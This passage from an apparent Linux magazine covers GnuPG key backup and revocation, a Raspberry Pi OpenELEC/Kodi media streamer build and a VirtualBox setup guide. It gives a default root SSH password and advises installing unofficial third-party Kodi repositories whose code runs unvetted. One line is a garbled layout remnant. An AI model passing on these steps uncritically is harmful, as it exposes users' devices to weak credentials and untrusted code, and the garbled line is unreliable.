The next best thing, and probably sufficient for the less paranoid, is to remove the primary key from your keyring when not in use and keep a secure backup somewhere suitable. You have to delete the entire key and then import only the subkeys. You should export the primary key before removing it, and bear in mind that the exported key file will be your only copy of your primary secret key - until you make a backup.
$ gpg --export-secret-keys alice > primary.gpg
$ gpg --delete-secret-key alice
$ gpg --import subkeys.gpg
Remember that if you do remove your primary key, you will need to import it if you need to use it (and then remove it again afterwards):
$ gpg --import primary.gpg

Revoke and recover
Your master keyring is your precious. You need to protect it, but you also need to be prepared to destroy it should the worst happen. You need a secure backup and also a revocation certificate. This is a special certificate that you can use to tell the world that your key cannot be trusted and, therefore, should not be used. Once that happens, messages cannot be signed nor encrypted. Existing messages may be decrypted and verified, but GnuPG will warn the user that the key is revoked.
GnuPG prepares a revocation certificate automatically when creating a key: look in ~/.gnupg/openpgp-revocs.d for it, named with the key's fingerprint and a .rev suffix. As a safeguard against accidental use, it needs to be modified before it can be used. It's a text file and contains instructions explaining what you need to do (remove a leading colon from the first line of the certificate).
You can create a revocation certificate yourself and you may want to do this to specify a reason for revocation:
$ gpg --gen-revoke alice > alice.rev
Follow the prompts to select a reason for revocation and to supply an optional description. GnuPG prints a message warning that you should keep the revocation certificate safe; they are as valuable as the private key they can invalidate. Should you ever need to use a revocation certificate, just import it into the keyring:
$ gpg --import alice.rev
You can also revoke directly by using the revkey command in edit mode. This can be used to revoke one or more keys and is how you would revoke a subkey without revoking the primary key. There are also revuid and revsig options that you can use to revoke user identities and signatures.
After revoking, like any other change to your keyring that you wish to publish, upload your keyring to a key server:
$ gpg --send-key alice

You can refer to a key using a user id, short or long key id, or fingerprint. Some tools may require them prefixed with "0x".

There are ways to further protect your private key and its revocation certificate, such as keeping printed copies in a secure location, splitting them into parts and storing those in multiple locations, or giving them to multiple trusted people. Paperkey (www.jabberwocky.com/software/paperkey) is a tool that extracts the secret parts of your key (see a grab bottom-right on the previous spread) and prints them with checksum data that makes it easier to type in by hand should the need ever arise:
$ paperkey --secret-key primary.gpg --output private.txt
Recovery is equally simple, using your public key:
$ paperkey --pubring public.gpg --secrets private.txt --output secret.gpg
Your recovered key is still protected by your passphrase, which you may want to give to some trusted third parties to be used in the event of your unfortunate demise. ssss or gfsplit implement "Shamir's Secret Sharing" (yes, that's the same Shamir of RSA fame) which lets you take something and split it in such a way that, say, three of five pieces are required to rebuild the original. You could split your key, revocation certificate, passphrase, etc, and give the split pieces to those trusted individuals you'd like to be able to use them when you're no longer able. ■
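If you want to try the secret-sharing approach for yourself, the ssss package provides a matching pair of commands; a rough sketch only - the secret is typed in at the prompt, and the threshold and share counts are just an example:
$ ssss-split -t 3 -n 5
$ ssss-combine -t 3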

Software
Discover the most powerful Linux
software and get using it
OpenELEC - Get to grips with the media system for desktops and embedded systems.
VirtualBox - Ensure you get the best out of your virtual systems with our essential guide.
NextCloud - The break away, all new cloud storage and document system is live for all.
Nagios - Industry-level system monitoring so you can track all your Linux PCs.

OpenELEC:
Media streamer
Crack out the hammer, we demonstrate how to build your own smart-streaming stick using a Raspberry Pi for both personal and internet media.

> OpenELEC runs an initial configuration wizard to get you connected - you'll need a USB hub if you have a Pi Zero and want network capabilities.

Take the time to check out OSMC (http://osmc.tv). It's another Kodi-based distro optimised for smaller devices (including Pi), and comes with its own custom, minimalist skin. There's little difference in performance, and while OSMC is simpler to use out of the box, OpenELEC provides a more Kodi-like experience.

Why fork out for an expensive set-top box when you can build your own for significantly less? Thanks to the powerful open-source Kodi media centre software (https://kodi.tv), you can access both locally stored personal media on demand, plus watch a wide range of internet streaming services, including catch-up TV.
The success of Kodi - formerly known as XBMC - has led to the development of Kodi-flavoured distributions (distros). If you're looking for a full-blown Ubuntu-based distro with Kodi sitting on top then Kodibuntu (http://kodi.wiki/view/Kodibuntu) will appeal.
Kodibuntu is overkill for most people's needs, which is where OpenELEC (www.openelec.tv) comes in. This is an embedded OS built around Kodi, optimised for less powerful setups and designed to be as simple to run and administer as possible. There's an underlying OS you can access via SSH, but for the most part, you can restrict yourself exclusively to the Kodi environment.
Four official builds are currently available: 'generic' covers 32-bit and 64-bit Intel, Nvidia and AMD graphics setups; two Raspberry Pi flavours: one for the Pi 2 and 3, and the other for everything else, including the Pi Zero and the new Zero W; and one final build is for Freescale iMX6 ARM devices. There are further unofficial builds for jailbroken Apple TV mark 1 boxes (head to http://chewitt.openelec.tv/appletv) as well as AMLogic-based hardware (http://bit.ly/amlogic-oe).

Choose your hardware
The cheapest way to build an OpenELEC streaming box from scratch is to base it around the Pi Zero. There's one slight complication caused by the fact it only has one USB port, so you'll need a powered hub to support both keyboard and Wi-Fi adaptor during the initial setup phase. Expect to pay between £30 and £40 for all the kit you need. You'll need a Pi Zero (obviously), case, power adaptor, Wi-Fi adaptor, microSD card, powered USB hub and accessories. If you're willing to spend a little more, the Raspberry Pi Model B+ costs £19.20, the quad-core Pi 2 Model B costs £28 or the Pi 3 Model B is £32 (http://uk-rsonline.com), not including power and Wi-Fi adaptors, micro SD card and case. Both come with an Ethernet port for wired networking, plus four USB ports and a full-size HDMI port - choose the Pi 2 or 3 if you plan to run a media server.
You'll need a keyboard for the initial configuration of OpenELEC, but once those steps are complete, you'll be able to control OpenELEC remotely via your web browser or using a free mobile app. You'll also need somewhere to store your media. If you only have a small (sub-50GB) collection, then splash out for a 64GB microSD card and store it locally; otherwise attach a USB hard drive or even store your media on a NAS drive and connect over the network. Note the latter option will slow things down considerably, and you may experience buffering, particularly if connected via Wi-Fi.


SSH access
Switch on SSH and you have access to the underlying Linux installation via the Terminal (use ssh root@192.168.x.y, substituting 192.168.x.y with your OpenELEC device's IP address. The password is 'openelec'). The main purpose for doing this is to configure OpenELEC without having to dive into System > OpenELEC. Start by typing ls -all and hitting Enter - you'll see the core folders are hidden by default.
Basic commands are supported - such as ifconfig for checking your network settings, and top to see current CPU and memory usage. There's not an awful lot you can do here - the idea is to give you access to useful tools only.
Network settings in OpenELEC are controlled by the connman daemon, eg, to change these, navigate to storage/.cache/connman where you'll find a lengthy folder name beginning wifi_. Enter this folder using cd wifi* and then type nano settings to gain access.
If you'd like to set a static IP address from here, change the following line:
IPv4.method=manual
Then add the following three lines beneath IPv6.privacy=disabled:
IPv4.netmask_prefixlen=24
IPv4.local_address=192.168.x.y
IPv4.gateway=192.168.x.z
Replace 192.168.x.y with your chosen IP address and 192.168.x.z with your router's IP address (get this using ifconfig). Save your changes and reboot.

> If you'd rather configure OpenELEC via a Terminal, you'll find a limited number of commands available.

You can download the latest version from http://openelec.tv/get-openelec where you'll find v6.0.1 as the latest release for both the Raspberry Pi and also generic hardware. It's not large, the full disc image is around 100MB. The files are compressed in TAR or GZ format, so you'll first need to extract them. The simplest way to do this is using your Linux distro's GUI - in Ubuntu, eg, copy the file to your hard drive, then right-click it and choose 'Extract Here'.

Build, install and configure
Now connect your micro SD card to your PC using a suitable card reader (you can pick one up for under £3 online) and use the $ dmesg | tail command or Disks utility to identify its mountpoint. Once done, type the following commands - which assume your drive is sdc and that your image file is in the Downloads folder.
$ umount /dev/sdc1
$ cd Downloads
$ sudo dd if=OpenELEC-RPi.arm-6.0.1.img of=/dev/sdc bs=4M
You'll want to use sudo dd if=OpenELEC-RPi2.arm-6.0.1.img of=/dev/sdc bs=4M if installing OpenELEC on the Pi 2/3. Wait while the image is written to your micro SD card - this may take a while, and there's no progress bar, so be patient (time for a cup of tea, perhaps?).
Once complete, unmount your drive and then eject it. Insert the micro SD card into the Pi, connect it up to monitor and keyboard and switch it on. You should immediately see a green light flash, and the screen come on.
The OpenELEC splash screen will appear, at which point it'll tell you it's resizing the card - it's basically creating a data partition on which you can store media locally if you wish. After a second reboot, you'll eventually find yourself presented with an initial setup wizard for Kodi itself. If you've not got a mouse plugged in, use Tab or the cursor keys to navigate between options, and Enter to select them.
Start by reviewing the hostname - OpenELEC - and changing it if you're going to run a media server and the name isn't obvious enough already. Next, connect to your Wi-Fi network by selecting it from the list and entering your passphrase. You can then add support for remote SSH access as well as Samba (see SSH Access box, above).
You can now control Kodi remotely if you wish via your web browser: type 192.168.x.y:80 into your browser (substituting 192.168.x.y with your Pi's IP address). Switch to the Remote tab and you'll find a handy point-and-click on-screen remote to use - what isn't so obvious is that your keyboard now controls Kodi too, as if it were plugged into your Pi directly. You'll also see tabs for movies, TV Shows and music - once you've populated your media libraries you'll be able to browse and set up content to play from here.
This approach relies on your PC or laptop being in line of sight of your TV - if that's not practical, press your tablet or phone into service as a remote control instead. Search the Google Play store for Kore (Android) or the App Store for Kodi Remote (iOS) and you'll find both apps will easily find your Pi and let you control it via a remote-like interface.
By default, OpenELEC uses DHCP to connect to your local network - if your Pi's local IP address changes, it can be hard to track it down in your web browser for remote configuration. Change this by choosing System > OpenELEC > Connections, selecting your connection and hitting Enter. Choose 'Edit' from the list and pick IPv4 to assign a static IP address you'll be able to use to always access Kodi in future. You can simply stick with the currently assigned address, or pick another. Make sure you select 'Save' to enable the change. If all of this sounds like too much bother, check out the box on SSH (see SSH Access above) for a way to change the underlying configuration files instead. »

By default, you only need a username ('kodi') to connect your remote PC or mobile to control Kodi - it's probably a good idea to add a password too - navigate to System > Settings > Services > Web Server to add a password and change the username.

> Kodi employs the use of scrapers to automatically grab artwork and metadata for your media files based on their filename and folder structure.
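As an aside, the same web server exposes Kodi's JSON-RPC API, so you can script the box as well as click around it. A rough sketch that pops a notification up on the TV - it assumes the web server is enabled on port 80, the default 'kodi' user has no password and 192.168.x.y is your Pi's address:
$ curl -u kodi: -H "Content-Type: application/json" -d '{"jsonrpc":"2.0","method":"GUI.ShowNotification","params":{"title":"Hello","message":"Sent from the shell"},"id":1}' http://192.168.x.y/jsonrpc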


» Set up libraries
The first thing to do is add your media to your library. Kodi supports a wide range of containers and formats, so you should have no problem unless you've gone for a particularly obscure format. Check the box (see Add Content to your Library, below) for advice on naming and organising your media so that Kodi can recognise it and display extra information about TV shows and movies. This uses the help of special 'scrapers'; tools that extract metadata from online databases such as movie titles, TV episode synopses and artwork to pair them with your media files for identification.
Where should you store this local content for Kodi to get at it? If your micro SD card is large enough - we'd suggest 64GB or greater - then you can store a fair amount of video and music on there. You can transfer files across the local network - open File Manager and opt to browse your network. Your OpenELEC device should show up - double-click the file sharing entry and you'll see folders for Music, Pictures, TV Shows and Videos - simply copy your files here to add them to your library. Once done, browse to Video or Music and the media files should already be present and accounted for, although at this point in time they've not been assigned a scraper to help you identify them yet.
It can be slow copying files across the network - you can transfer files directly to the card when it's mounted in a card reader on your PC, but you'll need to access File Manager as root to do so - in Ubuntu, eg, typing $ gksudo nautilus and hitting Enter will give you the access you need. A simpler option - if you have a spare USB port on your Pi - is to store your media on an external thumb or hard drive. Just plug the drive into your Pi, browse to Videos or Music and choose the 'Add...' option. Click 'Browse' and select the top-level folder containing the type of media you're adding - TV, movies or music.
If you've plugged in a USB device, you'll find it under root/media, while NAS drives are typically found under 'Windows Network (SMB)'. Once selected, click 'OK'. The Set Content dialogue box will pop up - use the up and down arrow buttons to select the type of media you're cataloguing and verify the selected scraper is the one you want to use. Check the content scanning options - the defaults should be fine for most people - and click 'Settings' to review advanced options (you may want to switch certification country to the UK for movies, eg). Click 'OK' twice and choose 'Yes' when prompted to update the library.
Once done, you'll find a new entry - Library - has been added to the media menu on the main screen. This gives you access to your content with filters such as genres, title or year to help navigate larger collections. Now repeat for the other types of media you have. If you want to include multiple folder locations within single libraries, you'll need to browse to the Files view, then right-click the library name (or select it and press c on the keyboard) to bring up a context menu. Select 'Edit Source' to add more locations, and 'Change Content' to change the media type and scraper if necessary.
The smartest thing to do with any digital media library is host it on a media server, which allows you to easily access it from other devices on your network and - in some cases - over the wider internet. Kodi has UPnP media server capabilities that work brilliantly with other instances of Kodi on your network as well as making your media accessible from other compatible clients. Media servers can be quite demanding, so we don't recommend using a Pi Zero or Pi Model B+. Instead, set it up on your most powerful PC (or Pi 2/3) and use OpenELEC to connect to it as a client.
As media servers go, Kodi's is rather basic. If you want an attractive, flexible server then see our Emby guide [Features, p32, LXF204]. Pair this with the Emby for Kodi add-on and you can access your Emby-hosted media without having to add it to your Kodi library. A similar add-on exists for users of Plex Media Server too, PleXBMC (http://bit.ly/PleXBMC), providing you with an attractive front-end.

Want to update OpenELEC to the latest build? First, download the latest update file (in TAR format) from http://openelec.tv/get-openelec and open File Manager and click Browse Network. Double-click your OpenELEC device and copy the TAR file into the Update folder. Reboot OpenELEC and you'll find the update will be applied.

> The Amber skin is a beautiful alternative to the more functional Confluence default. Sadly, there's no access to the OpenELEC configuration menu from it.
most people - and click ‘Settings’ to review advanced Plex Media Server too. PleXBMC (http://bit.ly/PleXBMC),
options (you may want to switch certification country to the providing you with an attractive front-end.

Add content to your library


Kodi works best with your locally stored digital media, but for it to recognise your TV shows from your music collection you need to name your media correctly and organise them into the right folders too. Kodi supports the same naming convention as its rival services Emby and Plex - we recommend using the following table to help. Need to rename files in a hurry? Then Filebot (www.filebot.net) is your new best friend. It checks file data against an enormous catalogue and assigns relevant metadata automatically.

> Name your media files correctly if you want them to appear fully formed in your media library.

Type | Folder structure | Syntax | Example
Music | Music\Artist\Album | artist - track name | Music\David Bowie\Blackstar\david bowie - lazarus.mp3
Movies | Movies\Genre\Movie Title | title (year) | Movies\Sci-Fi\Star Trek\star trek (2009).mkv
TV shows | TV\Genre\Show Title\Season | tvshow - s01e01 | TV\Sci-Fi\Fringe\Season 5\fringe - s05e09.mkv
Music videos | Music Videos\Artist | artist - track name | Music Videos\A-ha\a-ha - velvet.mkv
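If you prefer to work from the terminal, FileBot also has a command-line mode that can do the renaming in one pass; a rough sketch only - the path is an example and the exact options can vary between FileBot releases:
$ filebot -rename ~/Videos/TV --db TheTVDB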


If you want access to other UPnP servers via Kodi without any bells and whistles, then browse to System > Settings > Services > UPnP/DLNA and select 'Allow remote control via UPnP'. You can also set up Kodi as a media server from here: select 'Share my libraries' and it should be visible to any UPnP client on your network, although you may have to reboot.
Performance is going to be an issue on lower-powered devices, such as the Pi, and while the Pi 2 and 3 are pretty responsive out of the box, the Pi Zero may struggle at times. It pays, therefore, to try and optimise your settings to give your Pi as much resources as it needs to run smoothly. Start by disabling unneeded services - look under both System > OpenELEC > Services (Samba isn't needed if you're not sharing files to and from Kodi, eg) and System > Settings > Services (AirPlay isn't usually required). Incidentally, while you're in System > Settings, click 'Settings level: Standard' to select first Advanced then Expert to reveal more settings.
One bottleneck for Pi devices is dealing with large libraries - give it a helping hand by first going to Settings > Music > File lists and disabling tag reading. Also go into Settings > Video > Library and disable 'Download actor thumbnails'. You can also disable 'Extract thumbnails and video information' under File Lists.
The default Confluence skin is pretty nippy, although if you suffer from stutter when browsing the home screen, consider disabling the showing of recently added videos and albums: select Settings > Appearance, then click Settings in the right-hand pane under Skin. Switch to 'Home Window Options' and de-select both 'Show recently added...' options.
Speaking of Confluence, if you don't like the default skin, then try Amber - it's beautiful to look at, but easy on system resources. You do lose access to the OpenELEC settings when it's running, but you can always switch back to Confluence temporarily or use SSH for tweaks, if necessary. ■

Add catch-up TV to your streaming stick


1 Add BBC iPlayer
Browse to Videos > Add-ons. Select 'Get more...', then scroll through the list and find 'iPlayer WWW'. Select this and choose 'Install'. Once installed you'll be able to access it through Videos > Add-ons for access to both live and catch-up streams. Configure subtitles and other preferences via System > Settings > Add-ons > iPlayer WWW.

2 Get ITV Player
Navigate to System > File Manager. Select 'Add Source' followed by '<None>', enter http://www.xunitytalk.me/xfinity and select 'Done' followed by 'OK'. Hit Esc, then choose System > Settings > Add-ons > Install from ZIP file. Select xfinity from the list of locations, select 'XunityTalk_Repository.zip', hit Enter and wait for it to be installed.

3 Finish installation
Now select 'Install from repository' followed by XunityTalk Repository > Video add-ons, scroll down and select ITV. Choose Install and it should quickly download, install and enable itself. Go to Videos > Add-ons to access live streams of six ITV channels, plus access the past 30 days of programmes through ITV Player - a big improvement on the standard seven days offered on most platforms.

4 UKTV Play
Follow the instructions for ITV Player to add http://srp.nu as a source, then add the main repository via SuperRepo > isengard > repositories > superrepo. Next, choose Install from repository > SuperRepo > Add-on repository > SuperRepo Category Video. Finally, add UKTV Play from inside the SuperRepo Category Video repo to gain access to content from UKTV Play's free-to-air channels.



Software

VirtualBox:
Virtualisation
We reveal how virtualisation software can tap into your PC’s unused
processing power to help you run multiple operating systems.
Today's multi-core PCs are built to run multiple tasks simultaneously, and what better way to tap into all that power than through virtualisation? Virtualisation, and in particular hardware virtualisation, is the process of splitting a single physical PC (known as the 'host') into multiple virtual PCs (referred to as 'guests'), each capable of working and acting independently of the other.

Virtualisation software allows the host to carve up its memory, processor, storage and other hardware resources in order to share individual parcels with one or more guests. If your PC is powerful enough, you can run multiple virtual machines in parallel, enabling you to effectively split your computer in two to perform different tasks without having to tie up multiple PCs.

Virtualisation isn't simply a means of dividing up computing power, though. It also enables you to easily run alternative operating systems in a safe, sandboxed environment - your guest PC can be isolated [in theory - Ed] from your host, making it safe to experiment with new software or simply try out a different flavour of Linux, for example. It can also be used for compatibility purposes - you may have switched from Windows, for instance, but want access to a virtual Windows machine to run old programs without having to use a dual-boot setup.

It goes without saying that the faster and more powerful your PC, the better equipped it is to run one or more virtual machines. That said, if performance isn't the be-all and end-all of your virtualisation experiments, then it's perfectly possible to run a single virtual machine in even relatively low-powered environments.

Choose VirtualBox
There are many virtualisation solutions available for Linux, but what better way to meet your needs (or even just dip your toes in the water) than with the open-source solution, VirtualBox? VirtualBox may be free, but it's still a powerful option that offers both a friendly graphical front-end for creating, launching and managing your virtual machines, plus a raft of command-line tools for those who need them.

An older version of VirtualBox is available through the Ubuntu Software Center, but for the purposes of this tutorial we're going to focus on the newer version 5.x branch, which you can obtain from www.virtualbox.org/wiki/Linux_Downloads. You'll find that a variety of different builds exist, each one geared towards a specific distro (or distro version). Both 32-bit (i386) and 64-bit (AMD64) links are provided to downloadable and clickable Deb files, or you can follow the instructions provided to add the appropriate VirtualBox repository to your sources list.

Once it's installed, the quickest way to get started is to launch VirtualBox through the Dash. This opens the Oracle VM VirtualBox Manager, which is where all your virtual machines can be listed (and organised into groups). It's also where you create new VMs from scratch, but before you begin, select File > Preferences to change the default machine folder if you want to store your virtual machine settings somewhere other than your own home folder. This isn't a critical step, but as each guest may consume gigabytes of space for its own needs, you may prefer to choose a dedicated drive (or one with lots of free space). If you're looking to purchase a drive for your virtual machines, then consider an SSD to add zip to your VM's performance.

Create your first VM
With your virtual machine folder set, click 'OK' and then click the 'New' button to create your first virtual machine. The Create Virtual Machine Wizard works in either of two ways, Guided or Expert, with the latter putting the three configuration steps in a single window. Start by selecting your chosen OS and version from the two drop-down menus - VirtualBox supports all the major OSes, including BSD, Solaris and IBM OS/2 in addition to Windows, OS X and - of course - Linux. The Version drop-down changes depending on your initial selection: all the major distros as well as Linux kernel versions from 2.2 onwards are available.

It's important to choose the right OS and version because this will ensure that other machine settings are set so they're compatible. You'll see this immediately when the 'Memory size' slider changes to match the OS. This will be set to a comfortable minimum setting, so feel free to alter it using the slider - it's colour-coded green, amber and red to help you set the memory to a level that's comfortable for your host PC.

Quick tip: To give your VMs a speed boost, enable VT-x/AMD-V acceleration. First, visit http://bit.ly/1NFLGX2 to see if your processor is supported. If it is, make sure support is enabled in your PC's BIOS or UEFI - check your motherboard manual or website for instructions.

> VirtualBox enables you to set up, manage and run multiple guest machines from the comfort of your desktop.


Headless setup
One way to maximise your host PC's resources is to run your virtual machine headless. This means there's no way of interacting with that VM on the host PC: instead, you access it remotely using the Remote Display Protocol (RDP). First, make sure you have the VirtualBox Extension Pack installed - this provides support for VirtualBox's implementation of RDP - then enable it on your VM via Settings > Display > Remote Display tab by ticking 'Enable Server'. You'll need to change the default port (3389) if you're setting up multiple VMs in this way - choose unique ports for each between 5000 and 5050.

Once it's configured, you can launch your VM from the Terminal via one of two commands:
VBoxHeadless --startvm <uuid|vmname>
VBoxManage startvm "VM name" --type headless
Alternatively, hold Shift as you click the VM in the VirtualBox Manager, and you'll be able to monitor its progress from the Preview window before switching to your remote computer.

When it comes to accessing your headless VM from another PC, the rdesktop client is built into most distros, but VirtualBox also ships with rdesktop-vrdp, which gives your guest access to any USB devices plugged into the PC you're sat at. Use the following command:
rdesktop-vrdp -r usb -a 16 -N 192.168.x.y:0000
Replace .x.y with your host PC's IP address, and 0000 with the port number you allocated (3389 by default).

> Run your VM headless to cut resource usage if you plan to access it remotely.
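If you'd like a headless VM to come up automatically with the host, one approach is a small systemd unit on the host. This is only a sketch - the unit filename, the VM name and the user account that owns the VM are all assumptions to adjust:
# /etc/systemd/system/headless-vm.service (hypothetical name)
[Unit]
Description=Start a VirtualBox VM headless at boot
After=network.target

[Service]
User=youruser
Type=oneshot
RemainAfterExit=yes
ExecStart=/usr/bin/VBoxManage startvm "VM name" --type headless
ExecStop=/usr/bin/VBoxManage controlvm "VM name" acpipowerbutton

[Install]
WantedBy=multi-user.target
Enable it with sudo systemctl enable headless-vm.service and the guest will start and stop alongside the host.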

The figure you set is actual host RAM, not virtual memory, so be sure to leave enough for your PC's other tasks (including the running of VirtualBox itself).

The final option is to create a virtual hard disk. This basically starts out as a single file that represents your guest's hard drive, and will splinter off only when you start working with snapshots (pictured below). In most cases, leave 'Create a virtual hard disk now' selected and click 'Create', at which point you'll need to set its size, location (click the little folder button to choose a different location from the default), file type and how the virtual file will behave. For these latter options, the defaults of 'VDI' and 'Dynamically allocated' usually work best; the latter ensures that the physical file containing your virtual hard drive's contents starts small and grows only as it's filled with data. Click 'Create' and your virtual machine is ready and waiting for action.

Virtual hardware tweaking
It's tempting to dive straight in and start using your new virtual machine, but while the basic hardware settings are in place, you should take the time to ensure it has all the power and resources it needs to function as you want it to. You can always tweak these settings later, but the best time to set it up is before you begin.

Select your new virtual machine and click the 'Settings' button. Switch to the System tab, where you'll find three tabs: Motherboard, Processor and Acceleration. You can tweak your VM's base memory from the Motherboard tab, as well as switch chipset, although unless you need PCI Express support the default PIIX3 should be fine in most cases. The Pointing Device is set to 'USB Tablet' by default, but there's a 'PS/2 Mouse' option for legacy purposes.

The Extended Features section should already be set up according to the OS you've chosen, but if you'd like your virtual machine to have a UEFI rather than a BIOS, tick 'Enable EFI' here. Note, however, that this works only for Linux and OS X; Windows guests aren't (yet) supported.

If you have a multi-core CPU installed, switch to the Processor tab to allocate more than a single core to your VM, making sure you don't attempt to allocate more cores than your processor physically possesses (Hyperthreading should be discounted). You may also need to tick 'Enable PAE/NX' if your virtual machine needs access to more than 4GB of RAM on a host PC with an older 32-bit processor.

The Acceleration tab allows you to tap into the processor's virtualisation features if they exist - see the tip for details.

Other key settings
Switch to the Display tab to configure your virtual graphics card. Start by allocating as much memory as you think you'll need, and also tick the 'Enable 3D Acceleration' box to improve performance across all your VMs. If you're running a Windows virtual machine, then tick the 2D option too. Switch to the Remote Display tab if you'd like to access your VM remotely. The Video Capture tab makes it possible to record your VM screen as a video should you want to do so - the former feature requires the VirtualBox Extension Pack, which we'll talk about shortly.

The Storage tab is where you can configure the internal storage of your virtual PC - by default your virtual hard drive is added to the SATA controller, from where you can add more drives. You'll also see that a single DVD drive is also added to the IDE controller. Select it and click the little disc button next to the Optical Drive drop-down to select a physical drive or mount an ISO disk image as a virtual drive instead. Tick the 'Passthrough' option if you'd like to be able to write discs, play audio CDs or watch encrypted DVDs.

The options in the Audio and Serial Ports tabs are largely self-explanatory, but if you plan to make your guest VM visible over your local network for the purposes of sharing files and other resources, then select 'Network' and change the NAT setting to 'Bridged Adapter'. Other configurations are also available from here - 'NAT Network', eg, allows you to create a network of VMs that can see and interact with each other while remaining invisible to the host. NAT networks are configured independently via VirtualBox's File > Preferences menu (look under Network).

Quick tip: Make use of the VirtualBox Manager's new Group feature to organise your VMs into user-defined categories: right-click the first VM in the list and choose 'Group'. Right-click the group header and choose 'Rename', then create new machines directly from this group or drag other guests into it to assign them to the group.

> The ability to take snapshots of your virtual machines makes them particularly suitable as test beds.
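Most of these Settings-dialog tweaks can also be made from a terminal with VBoxManage modifyvm, which is handy if you like to script your VM builds. A quick sketch - the VM name, the memory and CPU figures and the host interface name (eth0) are examples to adapt, and the VM must be powered off while you change them:
$ VBoxManage modifyvm "Ubuntu VM" --memory 2048 --cpus 2
$ VBoxManage modifyvm "Ubuntu VM" --vram 128 --accelerate3d on
$ VBoxManage modifyvm "Ubuntu VM" --nic1 bridged --bridgeadapter1 eth0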


Working with USB peripherals
The USB tab is where you can capture specific USB devices for use in your VM. However, before you can use this feature, you need to make sure you add your username to the vboxusers group on your host PC using the following command in the Terminal:
sudo usermod -a -G vboxusers <username>
Once this is done, your USB devices will become visible to your VirtualBox guests. Note that VirtualBox supports only the older USB 1.1 implementation by default, but you can install the VirtualBox Extension Pack to add support for USB 2.0 and USB 3.0 among other extras (including PCI and host webcam passthrough). Download this Extension Pack from www.virtualbox.org, but note the licence restrictions: unlike VirtualBox, it's not open source and is free for 'personal evaluation' only.

You can easily connect to USB devices within your guest on the fly - click the USB button on the guest machine window and select your target peripheral from the list - but adding specific USB Device Filters here makes it possible to automatically capture specific devices when the VM boots. One example of where this could be handy is if you set up a VM as a headless TV server - it would allow the VM to take control of your USB TV stick the moment it starts. We cover the Shared Folders tab in the 'Share data' box below, while the User Interface tab allows you to specify which menu options are made available to this guest.

Your first boot
With your VM's hardware set up, you're ready to go. You need to point your virtual CD/DVD drive towards an ISO file (or physical disc) containing the installer of the OS you wish to emulate, then start the VM and follow the prompts to get started. Once running, your virtual machine acts in exactly the same way your main PC does - click inside the main window and your mouse and keyboard may be 'captured' by the VM, allowing you to work inside it. To release these back to your host PC, press the right-hand Ctrl key.

Once you've installed your target OS in the guest machine you'll need to install the Guest Additions - a series of drivers and applications that enhance the VM's performance. Key additions include a better video driver supporting a wider range of resolutions and hardware acceleration, mouse pointer integration, which allows you to more easily move the mouse between host and VM without it being captured, and support for shared folders.

Installing these for Windows guests is as simple as selecting Devices > Insert Guest Additions CD image... After a short pause, the setup wizard should appear. Things are a bit more complicated for Linux guests - see chapter 4.2.2 under VirtualBox's Help > Contents menu for distro-by-distro guides. Once you've followed the prerequisites, open the file manager and browse to the root of the Guest Additions CD, then right-click inside the window and choose 'Open in Terminal'. Once the Terminal window opens, the following command should see the additions installed:
sudo sh ./VBoxLinuxAdditions.run
After rebooting you should be able to resize your VM window to the desired resolution simply by clicking and dragging on it - have the Displays panel open in your guest when you're doing this to verify the dimensions as you resize.

Quick tip: It's possible to port your virtual machines to different PCs - select File > Export Appliance to set up an archive in OVF (Open Virtualization Format) format, using the OVA extension to bundle everything into a single file. Be warned: it doesn't include snapshots and often changes the virtual hard disk from VDI to VMDK format.

Take a snapshot
Your VM is now set up and ready for action. It should work in exactly the same way as any physical machine, but it has one crucial advantage: snapshots.

Share data
Getting data to and from your VM is a critical part of virtualisation, and VirtualBox makes this as simple as possible. The obvious way is to set up a bridged network as described earlier, then create shared folders with which you can swap data over your network, but there are other handy sharing tools provided too.

The Shared Folders feature works best with guests you don't want exposed to the wider network, and also allows you to make folders available from your host without sharing them on the network. Open your VM's settings and go to the Shared Folders tab and you can specify a folder on your host PC that's made available to your guest: click the plus ('+') button, select the folder you want to share and change its display name on your guest if necessary. You can also elect to make the folder read-only to the guest, have it mount automatically when the VM starts and, last but not least, choose 'Make Permanent' to have the shared folder persist beyond the current VM session.

Open the Devices menu and you'll find two other ways of sharing too: Shared Clipboard allows you to share the contents of the clipboard between host and guest (this can be limited to one-way sharing, or made bi-directional). You can also implement Drag-and-Drop, another way to quickly share files between host and guest by dragging files into and out of the guest machine window.

> Make life (and file-sharing) easy: you can configure VirtualBox to allow you to quickly transfer files to and from your guest using drag-and-drop.
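From inside a Linux guest with the Guest Additions installed, a shared folder can also be mounted by hand rather than relying on auto-mounting. A brief sketch, assuming you named the share 'hostfiles' in the VM's Shared Folders settings:
$ sudo mkdir -p /mnt/hostfiles
$ sudo mount -t vboxsf hostfiles /mnt/hostfiles
Auto-mounted shares appear under /media/sf_<name> instead, and your guest user normally needs to be a member of the guest's vboxsf group to read them.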


Snapshots let you take one-click backups of your guest at a specific point in time. You can then proceed secure in the knowledge you can roll back to the snapshot and undo all the changes you've made since.

You can create snapshots while your machine is powered off, or during use - just select Machine > Take Snapshot to do so. Give your snapshot an identifiable name, and also add a description if you wish, then click 'OK'.

When you take a snapshot, VirtualBox starts recording changes to the drive in a different file. If you delete a snapshot, those changes are merged back into the main file, while if you roll back to an earlier snapshot (or the base image), the snapshot's changes are lost unless you create an additional snapshot when prompted. VMs support multiple snapshots, and you can even move between them, allowing you to create multiple setups from within a single guest.

Terminal use
VirtualBox's user interface may be a convenient way to get started with virtualisation, but once you're up and running you'll be pleased to learn there are a number of command-line tools you can employ if that works better for you. You can even bypass the graphical VirtualBox Manager entirely if you're willing to learn the rather lengthy list of sub-commands for the VBoxManage tool, such as createvm and startvm, but even if you're happy with the point-and-click approach, there are a number of tools you should take a closer look at.

The first is VBoxSDL - if you'd like to launch your VM in a 'pure', distraction-free environment (so none of the controls offered by the default VM window), this is the tool for you. Its usage is pretty straightforward:
VBoxSDL --startvm <vmname>
Replace <vmname> with the name of your VM (or its UUID if you prefer). Once it's running, you'll not only have access to the menu commands offered by the main VirtualBox window, but also some handy shortcuts you can employ while pressing the host key (the right Ctrl key by default): f toggles full-screen view on and off, while n takes a snapshot. Press h to press the ACPI power button, p to pause and resume, q to power off or r to reset. Finally, press Del in conjunction with the host key and you'll send a Ctrl+Alt+Del to the guest machine. Alternatively, shut down your VM using the VBoxManage tool - just type the following command to initiate the ACPI power button, eg:
VBoxManage controlvm "VM name" acpipowerbutton
Another handy command-line tool is VBoxHeadless, which enables you to run your virtual machine headless and access it remotely from another computer - check out our Headless setup box for the details.

